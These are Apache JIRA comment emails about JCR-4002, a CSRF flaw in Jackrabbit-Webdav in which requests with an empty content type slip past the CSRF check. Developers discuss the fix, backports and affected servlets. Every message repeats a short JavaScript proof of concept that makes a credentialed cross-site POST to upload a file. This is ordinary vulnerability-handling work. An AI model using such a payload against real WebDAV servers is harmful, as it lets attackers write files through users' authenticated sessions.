[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15452125#comment-15452125
]
Julian Reschke commented on JCR-4002:
-
Backed out the changes in [r1758597|http://svn.apache.org/r1758597].
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15449010#comment-15449010
]
Julian Reschke commented on JCR-4002:
-
FWIW, the whitespace in the media type properly causes a CORS preflight in
Firefox.
For Chrome, I opened:
https://bugs.chromium.org/p/chromium/issues/detail?id=642346
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15446053#comment-15446053
]
Julian Reschke commented on JCR-4002:
-
Checking: is the whitespace in the content type intentional?
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445805#comment-15445805
]
Julian Reschke commented on JCR-4002:
-
As far as I can tell, JcrRemotingServlet would be vulnerable as well; it
extends from AbstractWebdavServlet, but does support POST.
The same might be true for other code.
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445482#comment-15445482
]
Julian Reschke commented on JCR-4002:
-
[~djaeggi]: as this is security-related, we need to backport to all supported
branches, right?
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445474#comment-15445474
]
Julian Reschke commented on JCR-4002:
-
trunk: [r1756604|http://svn.apache.org/r1756604]
[r1756173|http://svn.apache.org/r1756173]
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812
]
Julian Reschke commented on JCR-4002:
-
But that means that code extending from this now will have to the CSRF
protection, right? If this is true, we need (a) to document that and (b) to
review the existing code that *does* extend it (JSOP?).
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424706#comment-15424706
]
Dominique Jäggi commented on JCR-4002:
--
the method wasn't removed as such, it just returns 405. it can be overridden.
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424703#comment-15424703
]
Julian Reschke commented on JCR-4002:
-
Wait - isn't POST support needed in other servlets that extend from this?
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15422374#comment-15422374
]
angela commented on JCR-4002:
-
looks good to me.
> CSRF in Jackrabbit-Webdav using empty content-type
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
